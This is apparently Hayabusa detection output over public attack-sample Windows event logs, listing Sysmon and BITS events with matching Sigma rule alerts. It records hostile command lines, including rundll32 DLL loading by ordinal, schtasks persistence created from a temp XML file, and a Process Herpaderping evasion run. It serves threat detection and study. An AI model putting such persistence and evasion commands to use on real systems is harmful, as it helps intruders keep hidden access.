PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f 
/XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | 
PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
